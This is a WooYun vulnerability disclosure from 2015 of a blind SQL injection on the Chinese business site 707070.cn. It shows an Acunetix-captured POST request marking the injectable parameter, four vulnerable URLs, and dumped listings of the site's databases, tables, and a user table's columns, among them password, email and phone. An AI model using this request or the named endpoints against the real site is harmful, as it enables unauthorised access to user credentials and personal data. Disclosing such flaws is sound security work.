当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099054

漏洞标题:707070企领网POST盲注一枚

相关厂商:企领网

漏洞作者: 千斤拨四两

提交时间:2015-03-03 14:16

修复时间:2015-04-17 14:18

公开时间:2015-04-17 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

post注入

详细说明:

POST /cyjq/index.aspx?classid=3*&page=2 HTTP/1.1
Content-Length: 7519
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: CheckCode=L0464
Host: www.707070.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
Button1=&newskw=1&searchdomain=&top1%24headSearchType=chanpin&top1%24keywords=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=%2fwEPDwUKLTMxNTE4NTYyNA8WDh4EcGFnZQUBMh4FcGFnZTEFB%2bWIl%2bihqDIeBGlmZHEFASAeBUlEU3RyBQEzHgNwaWQFATAeBHBpZDEFATMeCHByb3ZpbmNlBQbmsrPljJcWAmYPZBYQZg8PFggeBHllYXIC3w8eBW1vbnRoAgIeA2RheQIcHgRkYXRlBRAyMDE15bm0MuaciDI45pelZBYGZg8WAh4EVGV4dAVmPGEgaHJlZj1odHRwOi8vd3d3LjcwNzA3MC5jbiAgdGFyZ2V0PSdfYmxhbmsnPue%2biuW5tOWkp%2bWQie%2b8jOWFg%2bWuteW%2fq%2bS5kCHmnKznq5nml6Xorr%2flrqLotoU15LiHSVA8L2E%2bZAIBDw9kFgQeCm9ua2V5cHJlc3MFG0VudGVyVGV4dEJveCgndG9wMV9TZWFyY2gnKR4HT25Gb2N1cwU0IGlmKHRoaXMudmFsdWU9PSfor7fovpPlhaXlhbPplK7lrZcnKXRoaXMudmFsdWU9Jyc7IGQCBA8WAh8LBWA8YSBocmVmPS9uZXdzL3Nob3ctMjY5NjQ1MS5odG1sICB0YXJnZXQ9J19ibGFuayc%2bMjAxNeW5tOWNgeWkp%2bW4guWcuuiQpemUgOacgOS4uumHjeimgeeahOWPkTwvYT5kAgEPFgIeC18hSXRlbUNvdW50AiIWRGYPZBYCZg8VAgExBuWMl%2bS6rGQCAQ9kFgJmDxUCATIG5aSp5rSlZAICD2QWAmYPFQIBMwbmsrPljJdkAgMPZBYCZg8VAgE0BuWxseilv2QCBA9kFgJmDxUCATUJ5YaF6JKZ5Y%2bkZAIFD2QWAmYPFQIBNgbovr3lroFkAgYPZBYCZg8VAgE3BuWQieael2QCBw9kFgJmDxUCATgJ6buR6b6Z5rGfZAIID2QWAmYPFQIBOQbkuIrmtbdkAgkPZBYCZg8VAgIxMAbmsZ%2foi49kAgoPZBYCZg8VAgIxMQbmtZnmsZ9kAgsPZBYCZg8VAgIxMgblronlvr1kAgwPZBYCZg8VAgIxMwbnpo%2flu7pkAg0PZBYCZg8VAgIxNAbmsZ%2fopb9kAg4PZBYCZg8VAgIxNQblsbHkuJxkAg8PZBYCZg8VAgIxNgbmsrPljZdkAhAPZBYCZg8VAgIxNwbmuZbljJdkAhEPZBYCZg8VAgIxOAbmuZbljZdkAhIPZBYCZg8VAgIxOQblub%2fkuJxkAhMPZBYCZg8VAgIyMAblub%2fopb9kAhQPZBYCZg8VAgIyMQbmtbfljZdkAhUPZBYCZg8VAgIyMgbph43luoZkAhYPZBYCZg8VAgIyMwblm5vlt51kAhcPZBYCZg8VAgIyNAbotLXlt55kAhgPZBYCZg8VAgIyNQbkupHljZdkAhkPZBYCZg8VAgIyNgbopb%2fol49kAhoPZBYCZg8VAgIyNwbpmZXopb9kAhsPZBYCZg8VAgIyOAbnlJjogoNkAhwPZBYCZg8VAgIyOQbpnZLmtbdkAh0PZBYCZg8VAgIzMAblroHlpI9kAh4PZBYCZg8VAgIzMQbmlrDnloZkAh8PZBYCZg8VAgIzMgblj7Dmub5kAiAPZBYCZg8VAgIzMwbpppnmuK9kAiEPZBYCZg8VAgIzNAbmvrPpl6hkAgIPFgIfDgILFhZmD2QWAmYPFQICMzUM55%2bz5a625bqE5biCZAIBD2QWAmYPFQICMzYJ5ZSQ5bGx5biCZAICD2QWAmYPFQICMzcM56em55qH5bKb5biCZAIDD2QWAmYPFQICMzgJ6YKv6YO45biCZAIED2QWAmYPFQICMzkJ6YKi5Y%2bw5biCZAIFD2QWAmYPFQICNDAJ5L%2bd5a6a5biCZAIGD2QWAmYPFQICNDEM5byg5a625Y%2bj5biCZAIHD2QWAmYPFQICNDIJ5om%2f5b635biCZAIID2QWAmYPFQICNDMJ5rKn5bee5biCZAIJD2QWAmYPFQICNDQJ5buK5Z2K5biCZAIKD2QWAmYPFQICNDUJ6KGh5rC05biCZAIDDxYCHgdWaXNpYmxlaGQCBA8WAh8OAgwWGGYPZBYCZg8VBQMyMzkCMTUb5piM6buO5Y6%2f55Wc54mn5Lqn5Lia6ZuG576kBuays%2bWMlwznp6bnmoflspvluIJkAgEPZBYCZg8VBQMxMzYCMTQi5bGx5rW35YWz6YeR5bGe5p2Q5paZ5Lqn5Lia6ZuG576kIAbmsrPljJcM56em55qH5bKb5biCZAICD2QWAmYPFQUDMTQzAjEzJ%2ba1t%2ba4r%2beOu%2beSg%2bWPiuWFtua3seWKoOW3peS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIDD2QWAmYPFQUDMzIyAjEyKuenpueah%2bWym%2beyruayuemjn%2bWTgeWKoOW3peS4muS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIED2QWAmYPFQUDMzIxAjExH%2bWNoum%2bmeacuuaisOWItumAoOS6p%2bS4mumbhue%2bpCAG5rKz5YyXDOenpueah%2bWym%2bW4gmQCBQ9kFgJmDxUFAjc3AjEwGeaKmuWugeawtOazpeS6p%2bS4mumbhue%2bpCAG5rKz5YyXDOenpueah%2bWym%2bW4gmQCBg9kFgJmDxUFAzI4NwE5GOWNoum%2bmeeUmOiWr%2bS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIHD2QWAmYPFQUDMjg1ATgi5YyX5oi05rKz5paH5YyW5Yib5oSP5Lqn5Lia6ZuG576kIAbmsrPljJcM56em55qH5bKb5biCZAIID2QWAmYPFQUDMzIxATcn5piM6buO5aSn6JKy5rKz546J57Gz572Q5aS05Lqn5Lia6ZuG576kBuays%2bWMlwznp6bnmoflspvluIJkAgkPZBYCZg8VBQMzMjUBNifnp6bnmoflspvmsb3ovablj4rpm7bpg6jku7bkuqfkuJrpm4bnvqQG5rKz5YyXDOenpueah%2bWym%2bW4gmQCCg9kFgJmDxUFAzIzNgE1KuaYjOm7juWOv%2bWQjuWPjOe8nee6q%2bacuumbtuS7tuS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAILD2QWAmYPFQUDMjMwATQXIOWUkOWxsemZtueTt%2bS6p%2bS4mue%2bpCAG5rKz5YyXCeWUkOWxseW4gmQCBQ8PFg4eCVVybFBhZ2luZ2ceCFBhZ2VTaXplAgweC1JlY29yZGNvdW50AhkeDFVybFJld3JpdGluZ2ceEEN1cnJlbnRQYWdlSW5kZXgCAh4OQ3VzdG9tSW5mb1RleHQFggHlvZPliY3nrKw8Zm9udCBjb2xvcj0nI2ZmODgwMCc%2bMjwvZm9udD4vM%2bmhtSAg5YWxPGZvbnQgY29sb3I9JyNmZjg4MDAnPjI1PC9mb250PuadoeiusOW9lSDmr4%2fpobU8Zm9udCBjb2xvcj0nI2ZmODgwMCc%2bMTI8L2ZvbnQ%2b5p2hHglVUlBhdHRlcm4FEGxpc3QtMy1wezB9Lmh0bWxkZAIIDxYCHw4CChYUZg9kFgJmDxUDJ%2bmrmOaWsOWMuuW0m%2bi1t%2bWNq%2baYn%2bmAmuS%2foeS6p%2bS4mumbhue%2bpAcyNjk1ODU2J%2bmrmOaWsOWMuuW0m%2bi1t%2bWNq%2baYn%2bmAmuS%2foeS6p%2bS4mumbhue%2bpGQCAQ9kFgJmDxUDNuaOouaygumVh%2baJk%2bmAoOS4tOayguadv%2badkOWutuWFt%2bS6p%2bS4mumbhue%2bpOaguOW%2fg%2bWMugcyNjk1ODU1LeaOouaygumVh%2baJk%2bmAoOS4tOayguadv%2badkOWutuWFt%2bS6p%2bS4mumbhue%2bpGQCAg9kFgJmDxUDMOacieWFs%2bS4iueKuemhueebruW8uuWfuuWjruWkp%2bS6p%2bS4mumbhue%2bpOi1hOiurwcyNjk1ODU0LeacieWFs%2bS4iueKuemhueebruW8uuWfuuWjruWkp%2bS6p%2bS4mumbhue%2bpOi1hGQCAw9kFgJmDxUDIeWGnOS4muS6p%2bS4mumbhue%2bpOimgeaJqeWkp%2binhOaooQcyNjk1ODUzIeWGnOS4muS6p%2bS4mumbhue%2bpOimgeaJqeWkp%2binhOaooWQCBA9kFgJmDxUDPTIwMTXkuqfkuJrpm4bogZrljLrovazlnovljYfnuqfkuJPpobnooYzliqjorqHliJLmraPlvI%2flkK%2fliqgHMjY5NTg1MisyMDE15Lqn5Lia6ZuG6IGa5Yy66L2s5Z6L5Y2H57qn5LiT6aG56KGM5YqoZAIFD2QWAmYPFQMw5YWI6L%2bb57uP6aqM5o6o5Yqo5Lqn5Lia5Y2H57qn5YC85b6X5oiR5Lus5a2m5LmgBzI2OTU4NTEt5YWI6L%2bb57uP6aqM5o6o5Yqo5Lqn5Lia5Y2H57qn5YC85b6X5oiR5Lus5a2mZAIGD2QWAmYPFQM25YGl5bq356eR5oqA77ya5Lit5bGx5YGl5bq356eR5oqA5Yib5paw5Z6L5Lqn5Lia6ZuG576kBzI2OTU4NTAt5YGl5bq356eR5oqA77ya5Lit5bGx5YGl5bq356eR5oqA5Yib5paw5Z6L5LqnZAIHD2QWAmYPFQM15o2u5oql6YGT77yM5LuK5bm06YeN54K55o6o6L%2bbNjDkuKrkuqfkuJrpm4bnvqTlj5HlsZUHMjY5NTg0OSzmja7miqXpgZPvvIzku4rlubTph43ngrnmjqjov5s2MOS4quS6p%2bS4mumbhmQCCA9kFgJmDxUDOOaJk%2bmAoOmrmOerr%2bS6p%2bS4mumbhue%2bpCAg5o6o6L%2bb5YWI6KGM5YWI6K%2bV5pS56Z2p5Lu75YqhBzI2OTU4NDgs5omT6YCg6auY56uv5Lqn5Lia6ZuG576kICDmjqjov5vlhYjooYzlhYjor5VkAgkPZBYCZg8VAzbigJzms6Xohb%2flt6jkurrigJ3miJDkuLrpm4bnvqTpvpnlpLTkvIHkuJrnmoTku6PlkI3or40HMjY5NTg0Ny3igJzms6Xohb%2flt6jkurrigJ3miJDkuLrpm4bnvqTpvpnlpLTkvIHkuJrnmoRkAgkPFgIfDgIKFhRmD2QWAgIBDxYCHwsFbTxBIGhyZWY9Jy96ZmNnL3Nob3ctYzE5Ny5odG1sJyB0aXRsZT3lub%2flt57mlL%2flupzph4fotK3nvZEgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuW5v%2bW3nuaUv%2bW6nOmHh%2bi0ree9kTwvQT5kAgEPZBYCAgEPFgIfCwWPATxBIGhyZWY9Jy96ZmNnL3Nob3ctcDMuaHRtbCcgdGl0bGU95bm%2f6KW%2f5aOu5peP6Ieq5rK75Yy65pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7lub%2fopb%2flo67ml4%2foh6rmsrvljLrmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAICD2QWAgIBDxYCHwsFazxBIGhyZWY9Jy96ZmNnL3Nob3ctMjUuaHRtbCcgdGl0bGU95pS%2f5bqc6YeH6LSt5L%2bh5oGv572RIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7mlL%2flupzph4fotK3kv6Hmga%2fnvZE8L0E%2bZAIDD2QWAgIBDxYCHwsFcjxBIGhyZWY9Jy96ZmNnL3Nob3ctYzg3Lmh0bWwnIHRpdGxlPeadreW3nuW4guaUv%2bW6nOmHh%2bi0ree9kSBzdHlsZT0nZm9udC1zaXplOjE0cHg7JyA%2b5p2t5bee5biC5pS%2f5bqc6YeH6LSt572RPC9BPmQCBA9kFgICAQ8WAh8LBYoBPEEgaHJlZj0nL3pmY2cvc2hvdy1wMjQuaHRtbCcgdGl0bGU95YaF6JKZ5Y%2bk6Ieq5rK75Yy65pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7lhoXokpnlj6Toh6rmsrvljLrmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAIFD2QWAgIBDxYCHwsFcTxBIGhyZWY9Jy96ZmNnL3Nob3ctcDQuaHRtbCcgdGl0bGU95rW35Y2X5pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7mtbfljZfmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAIGD2QWAgIBDxYCHwsFeTxBIGhyZWY9Jy96ZmNnL3Nob3ctYzIwMC5odG1sJyB0aXRsZT3nj6DmtbfluILmlL%2flupzph4fotK3kuK3lv4Mgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuePoOa1t%2bW4guaUv%2bW6nOmHh%2bi0reS4reW%2fgzwvQT5kAgcPZBYCAgEPFgIfCwV3PEEgaHJlZj0nL3pmY2cvc2hvdy0yMS5odG1sJyB0aXRsZT3kuK3lm73mlL%2flupzph4fotK3noJTnqbbmiYAgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuS4reWbveaUv%2bW6nOmHh%2bi0reeglOeptuaJgDwvQT5kAggPZBYCAgEPFgIfCwV%2bPEEgaHJlZj0nL3pmY2cvc2hvdy1wMTQuaHRtbCcgdGl0bGU96L695a6B55yB5pS%2f5bqc6ZuG5Lit6YeH6LSt572RIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7ovr3lroHnnIHmlL%2flupzpm4bkuK3ph4fotK3nvZE8L0E%2bZAIJD2QWAgIBDxYCHwsFbDxBIGhyZWY9Jy96ZmNnL3Nob3ctcDE3Lmh0bWwnIHRpdGxlPemdkua1t%2baUv%2bW6nOmHh%2bi0ree9kSBzdHlsZT0nZm9udC1zaXplOjE0cHg7JyA%2b6Z2S5rW35pS%2f5bqc6YeH6LSt572RPC9BPmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFB0J1dHRvbjHFC%2beJEn5h8jYo339cogMrTqzQPg%3d%3d


http://www.707070.cn/ajax/newspj.aspx?aid=2696455&id=good&time=1425106320821
http://www.707070.cn/ajax/vote.aspx?id=good&time=1425106335576&vid=
37
http://www.707070.cn/cyjq/index.aspx?classid=3&page=2
http://www.707070.cn//news/list.aspx?classid=1
都存在注入


数据库信息:

available databases [11]:                                                      
[*] 33fanwennew
[*] 70
[*] 70yule
[*] jinghua
[*] master
[*] model
[*] msdb
[*] shangcheng
[*] tempdb
[*] tfsbfj
[*] tfsbqiye
Database: 70                                                                   
[289 tables]
+--------------------------+
| Canshou                  |
| IPTABLE                  |
| Kind                     |
| NM_LoginInfo             |
| S_City                   |
| S_District               |
| S_Province               |
| TB_Menu                  |
| UpdateNewsContentjilu    |
| View_compro              |
| View_indexpj             |
| View_khlx                |
| View_otherpro            |
| View_pjlist              |
| View_pjsalepx            |
| View_proclass            |
| View_proclass            |
| View_salepx              |
| View_salexx              |
| View_samplelist          |
| View_tb_user             |
| View_userdep             |
| fj_user0-3               |
| fj_user0-3               |
| fj_user11-13             |
| fj_user13-15             |
| fj_user15-17             |
| fj_user3-5               |
| fj_user5-7               |
| fj_user7-9               |
| fj_user9-11              |
| address                  |
| administrator            |
| annualrevenue            |
| aprofiletemp             |
| baojia                   |
| biztype                  |
| chanpincontentjilu       |
| commend                  |
| companysize              |
| dtproperties             |
| fj_70usercaiji           |
| fj_usercaiji             |
| fj_userdelete            |
| fj_userhangye            |
| fj_userlist              |
| fj_usernew               |
| fj_usersearch            |
| fj_usertemp              |
| insertcgsjilu            |
| interview                |
| jbright_article_cyjq     |
| jbright_article_cyjq     |
| jbright_article_qysp     |
| jbright_article_zfcg     |
| jbright_articlebf        |
| jbright_articleminglu    |
| jbright_articlemobi      |
| jbright_articletest      |
| jbright_secret           |
| kh_33qiyenews            |
| kh_70news                |
| kh_70otherprotemp        |
| kh_City                  |
| kh_District              |
| kh_Province              |
| kh_adminlog              |
| kh_al                    |
| kh_anli                  |
| kh_areacode              |
| kh_article2              |
| kh_article2              |
| kh_articleclass2         |
| kh_articleclass2         |
| kh_articleclass3com      |
| kh_articleclass3com      |
| kh_articleclass3pro      |
| kh_articleclass3temp     |
| kh_articlelink           |
| kh_articletemp           |
| kh_az                    |
| kh_bspmax                |
| kh_bspmaxtemp            |
| kh_bzclass               |
| kh_bzclass               |
| kh_caigouclass           |
| kh_caigouclass           |
| kh_caijipub              |
| kh_cgly                  |
| kh_cgmsg                 |
| kh_cgsbd                 |
| kh_cgsbd                 |
| kh_cgsiduserid           |
| kh_cgsuser               |
| kh_chanye                |
| kh_chanyesf              |
| kh_chengguo              |
| kh_chengyu               |
| kh_classkw1              |
| kh_classkw1              |
| kh_classkw2              |
| kh_classprokw2           |
| kh_comlz                 |
| kh_compj                 |
| kh_comproclass           |
| kh_comtest               |
| kh_cpzt                  |
| kh_cpztxg                |
| kh_delcgs                |
| kh_delchanpin            |
| kh_delly                 |
| kh_email                 |
| kh_esxx                  |
| kh_fjpro                 |
| kh_fjuser                |
| kh_ftjf                  |
| kh_gbook                 |
| kh_getpwd                |
| kh_gongyijigou           |
| kh_gongyijigou           |
| kh_gongyinews            |
| kh_gongyiyulu            |
| kh_history               |
| kh_huafei                |
| kh_hyjhcg                |
| kh_hytop2offer           |
| kh_hz                    |
| kh_indexarticle          |
| kh_indexcom              |
| kh_indexpro              |
| kh_ip                    |
| kh_jflist                |
| kh_jhaoyou               |
| kh_jhcg                  |
| kh_jl                    |
| kh_jobclass              |
| kh_jobclass              |
| kh_joinnum               |
| kh_kh                    |
| kh_khzl                  |
| kh_kjbuchong             |
| kh_kjtz                  |
| kh_lastlf                |
| kh_lbchuli               |
| kh_link_mlzx             |
| kh_link_mlzx             |
| kh_linkqy                |
| kh_ljlb                  |
| kh_luck                  |
| kh_ly                    |
| kh_minglumes             |
| kh_mingyan               |
| kh_msg                   |
| kh_nametest              |
| kh_newspj                |
| kh_otherarticle          |
| kh_otherdzyb             |
| kh_otherprobf            |
| kh_otherprobf            |
| kh_otherprocandel        |
| kh_otherprotemp          |
| kh_otherprozishujiaoshao |
| kh_pjcaozuo              |
| kh_pjclass               |
| kh_pl                    |
| kh_proclass1             |
| kh_proclass1             |
| kh_proclass2             |
| kh_proclass3             |
| kh_proclassshuxing       |
| kh_prokwcandel           |
| kh_prolbchuli1           |
| kh_prolbchuli1           |
| kh_propj                 |
| kh_proshuxinglist        |
| kh_proshuxinglist        |
| kh_qiyetag               |
| kh_qq                    |
| kh_qyhd                  |
| kh_qyhd                  |
| kh_randarticle           |
| kh_randlink              |
| kh_randprolink           |
| kh_rdhtnews              |
| kh_rdhtnews              |
| kh_renzheng              |
| kh_rzpj                  |
| kh_searchkh              |
| kh_sendemail             |
| kh_sgmes                 |
| kh_shybook               |
| kh_sjy                   |
| kh_sor                   |
| kh_splink                |
| kh_sppj                  |
| kh_syscanshu             |
| kh_sysset                |
| kh_tagclass              |
| kh_tbclass               |
| kh_temp1                 |
| kh_temp1                 |
| kh_temp2                 |
| kh_tempclasskw           |
| kh_tempdelpro            |
| kh_tempproclasskw        |
| kh_tempproclasskw        |
| kh_tjcgs                 |
| kh_tjoffer               |
| kh_tjpro                 |
| kh_tongjimember          |
| kh_tongjimember          |
| kh_tongjiqiantai         |
| kh_tophd                 |
| kh_tougao                |
| kh_updatepro             |
| kh_user4                 |
| kh_userlink              |
| kh_userlog               |
| kh_usermenu              |
| kh_usernum               |
| kh_usershuxing           |
| kh_usersonmenu           |
| kh_vistior               |
| kh_votemingpian          |
| kh_votemingpian          |
| kh_votepjmingpian        |
| kh_votepjmingpian        |
| kh_weibo                 |
| kh_wymsg                 |
| kh_xc                    |
| kh_xguser                |
| kh_xgusertemp            |
| kh_xiaohua               |
| kh_xiaotu                |
| kh_xmcs                  |
| kh_xunrencs              |
| kh_xunrencs              |
| kh_xunrenpl              |
| kh_xxautogengxin         |
| kh_xxcaozu               |
| kh_xxclassminglu         |
| kh_xxclassminglu         |
| kh_xxcom                 |
| kh_xxkw                  |
| kh_xykjlf                |
| kh_yqlj                  |
| kh_yyclass               |
| kh_zfcg                  |
| kh_zfclass               |
| kh_zhanhui               |
| kh_zhishuset             |
| kh_zhuanjia              |
| kh_zhufu                 |
| kh_ziliaoclass           |
| kh_ziliaoclass           |
| kh_zipcode               |
| kh_zixun                 |
| kh_zjhf                  |
| kh_zjlog                 |
| kh_zlclass               |
| kh_zlclass               |
| kh_zlmm                  |
| kh_zlpj                  |
| kh_zs                    |
| kh_zt                    |
| kh_zzad                  |
| kwad                     |
| liuyanall                |
| liuyanall                |
| liuyanmingpian           |
| pangolin_test_table      |
| pjoffer                  |
| principalship            |
| product_company          |
| product_sonsort          |
| product_sort             |
| province                 |
| provincetemp             |
| s_bpic                   |
| s_spic                   |
| searchkw                 |
| shangyu                  |
| shoucang                 |
| topic_type               |
| updatecardlogodatajilu   |
| updatecardtimejiluflag   |
| updatecardtimejiluflag   |
| updatejilu               |
| yjtg_tophd               |
+--------------------------+
Database: 70
Table: fj_70usercaiji
[156 columns]
+-------------------+
| Column            |
+-------------------+
| adddate           |
| address           |
| age               |
| annualrevenue_id  |
| answer            |
| bad               |
| biztype_id        |
| bz1               |
| c                 |
| caozuo            |
| caozuoadddate     |
| caozuoadddate1    |
| cgpro             |
| cgsid             |
| chandi            |
| city              |
| comadddate        |
| comms             |
| companyname       |
| companypage       |
| companysize_id    |
| companysizeqt     |
| complace          |
| crmcontent        |
| d                 |
| delnum            |
| departname        |
| email             |
| ewm               |
| ewmsize           |
| faren             |
| fax               |
| fjuserid          |
| fsdate            |
| gender            |
| good              |
| grade             |
| grade_pass        |
| grade_passaddyear |
| grade_passdate    |
| guimo             |
| gz                |
| hangye            |
| hits              |
| hytype            |
| ifcgs             |
| ifcl              |
| iffs              |
| iffs3             |
| iftop             |
| ifts              |
| ifxz              |
| img               |
| imgcaozuo         |
| IP                |
| jf                |
| jhqgid            |
| jianjie           |
| jobtitle          |
| jointime          |
| jyms              |
| khlevel           |
| khorder           |
| khtype            |
| lastloghyzx       |
| lastlogtime       |
| lastlxdate        |
| lastpjdate        |
| lastxxdate        |
| lastztdate        |
| loglx             |
| lognum            |
| membertype        |
| mfnum             |
| mmfj              |
| mmfjtjhy          |
| modidate          |
| mpassnum          |
| msgread           |
| msn               |
| myid              |
| myid1             |
| nextlx            |
| nickname          |
| nothy             |
| noxxts            |
| othercpid         |
| otherpjid         |
| otherybid         |
| p                 |
| paddress          |
| pass              |
| passnum           |
| password          |
| pcompanyname      |
| pemail            |
| pfax              |
| phone             |
| pmphone           |
| point             |
| postcode          |
| pprofile          |
| pqq               |
| principalship     |
| principalship_id  |
| profile           |
| province_id       |
| ptel              |
| qq                |
| qqid              |
| question          |
| see               |
| session           |
| sex               |
| shangye           |
| sinaid            |
| smdate            |
| smpass            |
| sqdate            |
| suozaidi          |
| telnum            |
| TitleColor        |
| TitleColor1       |
| tjhy              |
| tjzj              |
| truename          |
| ucenterstyle      |
| ucenterword       |
| user_checked      |
| user_id           |
| user_mark         |
| user_rongyu       |
| user_rongyu_intro |
| user_style        |
| user_zizhi        |
| user_zizhi_intro  |
| username          |
| UserTopicCount    |
| xcy               |
| xcy1              |
| xueli             |
| yes1              |
| yes2              |
| yes3              |
| yye               |
| yz                |
| yzok              |
| z1                |
| zclb              |
| zhic              |
| zhiw              |
| zijin             |
| zy                |
| zyhangye          |
| zynum             |
| zypro             |
+-------------------+
数据信息较庞大


漏洞证明:

dd.png


ttt.png


p.jpg

修复方案:

看好你。。。

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论